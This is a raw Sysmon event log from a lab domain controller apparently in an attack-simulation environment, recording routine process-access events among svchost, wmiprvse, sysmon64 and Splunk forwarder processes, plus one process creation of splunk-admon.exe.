12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.296{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.249{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.109{266CAFBE-64F8-6064-0901-00000000AE01}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 